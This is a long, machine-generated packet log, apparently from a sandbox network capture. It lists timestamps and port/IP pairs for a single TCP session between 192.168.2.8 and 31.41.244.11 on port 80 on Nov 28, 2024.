                                                  Nov 28, 2024 13:12:13.745053053 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.745872021 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.745923042 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.746006012 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.746053934 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.746876955 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.746928930 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.746977091 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.747024059 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.747821093 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.747869015 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.747900009 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.747948885 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.748754025 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.748801947 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.748869896 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.748914957 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.749739885 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.749789000 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.749850035 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.749893904 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.750716925 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.750761032 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.750844955 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.750890970 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.751766920 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.751822948 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.751843929 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.751883030 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.752686024 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.752739906 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.752793074 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.752840996 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.753648996 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.753710985 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.753762960 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.753812075 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.754623890 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.754669905 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.754817009 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.754863977 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.755578995 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.755633116 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.755676985 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.755722046 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.756568909 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.756616116 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.756649017 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.756692886 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.757524014 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.757567883 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.757644892 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.757685900 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.758503914 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.758550882 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.758749008 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.759479046 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.759540081 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.759625912 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.759673119 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.760422945 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.760469913 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.760529995 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.760577917 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.761421919 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.761470079 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.761533976 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.761576891 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.762388945 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.762443066 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.762557983 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.762599945 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.763375044 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.763492107 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.763540030 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.764348984 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.764394999 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.764480114 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.764535904 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.765305996 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.765357018 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.765362024 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.765409946 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.766283989 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.766329050 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.766371965 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.766421080 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.767281055 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.767326117 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.767373085 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.768246889 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.768313885 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.768486023 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.768526077 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.769268990 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.769321918 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.769351959 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.769396067 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.770186901 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.770235062 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.770319939 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.770569086 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.771188974 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.771258116 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.771332026 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.772146940 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.772201061 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.772242069 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.772310019 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.773116112 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.773176908 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.773210049 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.774014950 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.774074078 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.779474974 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.779530048 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.779531956 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.779581070 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.779990911 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.780040979 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.780155897 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.780205011 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.780929089 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.780977964 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.780997992 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.781043053 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.781964064 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.782015085 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.782180071 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.782232046 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.782284975 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.782330036 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.783267021 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.783318043 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.783459902 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.783504963 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.784903049 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.784953117 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.784990072 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.785033941 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.786218882 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.786238909 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.786269903 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.786288023 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.786767960 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.786820889 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.786844015 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.786890030 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.787578106 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.787597895 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.787627935 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.787641048 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.788268089 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.788314104 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.788420916 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.788467884 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.789050102 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.789098978 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.789144039 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.789187908 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.790107965 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.790177107 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.790184021 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.790241003 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.790992022 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.791042089 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.791343927 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.791393042 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.937443018 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.937467098 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.937532902 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.937639952 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.937639952 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.937675953 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.938529015 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.938591003 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.938654900 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.938703060 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.939501047 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.939618111 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.939668894 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.940473080 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.940526009 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.940568924 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.940607071 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.941534042 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.941581964 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.941672087 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.941720009 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.942430019 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.942476988 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.942528009 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.942569017 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.943444967 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.943523884 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.943571091 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.944422007 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.944470882 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.944475889 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.944519997 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.945400953 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.945456982 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.945501089 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.945550919 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.946306944 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.946353912 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.946398020 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.946438074 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.947320938 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.947402000 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.947459936 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.948261976 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.948324919 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.948411942 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.948462009 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.949253082 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.949302912 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.949731112 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.949776888 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.950206995 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.950262070 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.950310946 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.950351954 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.951183081 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.951302052 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.951353073 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.952146053 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.952250004 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.952315092 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.953181028 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.953238010 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.953357935 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.953553915 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.954197884 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.954257965 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.954277992 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.954327106 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.955295086 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.955344915 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.955414057 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.956022024 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.956077099 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.956132889 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.956181049 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.957032919 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.957078934 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.957149029 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.957190037 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.957998037 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.958046913 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.958179951 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.958224058 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.959003925 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.959142923 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.959201097 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.959240913 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.959944963 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.960033894 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.960098028 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.960930109 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.960979939 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.961086988 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.961134911 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.961896896 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.962059975 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.962106943 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.962852955 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.963069916 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.963119030 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.963828087 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.963882923 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.963908911 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.963964939 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.964823008 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.964968920 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.965018988 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.966082096 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.966130972 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.966197014 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.966247082 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.966825962 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.966871977 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.966893911 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.966939926 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.967713118 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.967758894 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.967788935 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.967839956 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.968700886 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.968754053 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.968760014 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.968813896 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.969660044 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.969707966 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.969763041 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.969810009 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.970623970 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.970747948 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.970755100 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.970794916 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.971601009 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.971647978 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.971668005 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.971713066 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.972640038 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.972688913 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.972716093 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.972759962 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.973589897 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.973661900 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.973696947 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.973741055 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.974513054 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.974560976 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.974620104 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.974666119 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.975698948 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.975740910 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.980825901 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.980884075 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.980926037 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.981214046 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.981281042 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.981339931 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.981393099 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.981443882 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.982280016 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.982326031 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.982460022 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.982501984 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.983198881 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.983248949 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.983499050 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.983539104 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.983551979 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.983584881 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.984482050 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.984536886 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.984591961 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.984637976 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.985465050 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.985515118 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.985553980 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.985601902 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.986434937 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.986485958 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.986530066 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.986572027 CET4971680192.168.2.831.41.244.11
